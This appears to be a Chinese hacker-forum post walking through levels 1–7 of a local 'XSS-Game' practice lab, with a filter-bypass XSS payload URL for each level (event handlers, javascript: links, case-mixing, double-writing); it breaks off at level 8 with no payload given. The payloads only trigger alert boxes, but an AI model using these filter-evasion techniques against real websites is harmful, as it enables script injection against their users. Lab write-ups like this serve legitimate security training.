跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

XSS-Game

KaiWn
KaiWn
PHP

精选回复

发布于

  1. 很简单的弹窗

    http://192.168.31.177/xssgame/level1.php?name=<script>alert(1)</script>

    2857712-20220716151721507-840936239.png

  2. 过滤了><

    http://192.168.31.177/xssgame/level2.php?keyword=" oninput='alert(1)'//&submit=‘搜索’

    2857712-20220716151742914-591307722.png

  3. 过滤了><'

    用单引号替换了双引号

    http://192.168.31.177/xssgame/level3.php?keyword=' oninput=alert(1) //&submit=搜索

    2857712-20220716151806792-241744351.png

  4. 过滤了><"

    http://192.168.31.177/xssgame/level4.php?keyword=" onm ouseover=alert(1)//&submit=搜索

    2857712-20220716151822899-1139729880.png

  5. script替换成scr_ipton事件替换成了on_事件

    利用伪协议 <a href='javascript:alert(1)'>来执行弹框

    http://192.168.31.177/xssgame/level5.php?keyword="><a href='javascript:alert(1)'> //&submit=搜索

    2857712-20220716151843122-598014425.png

  6. script替换成scr_ipton事件替换成了on_事件href替换成了hr_ef

    大小写绕过

    http://192.168.31.177/xssgame/level6.php?keyword="<sCRipt>alert(1)</script>//&submit=搜索

    2857712-20220716151902040-1711134646.png

    2857712-20220716151917659-519895536.png

  7. scriptonhref直接替换为空

    双写绕过

    http://192.168.31.177/xssgame/level7.php?keyword=1" oonnmouseover=alert(1)>//&submit=搜索

    2857712-20220716151939924-2090994477.png

  8. script替换成了scr_ipton事件替换成了on_事件href替换成了hr_ef

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。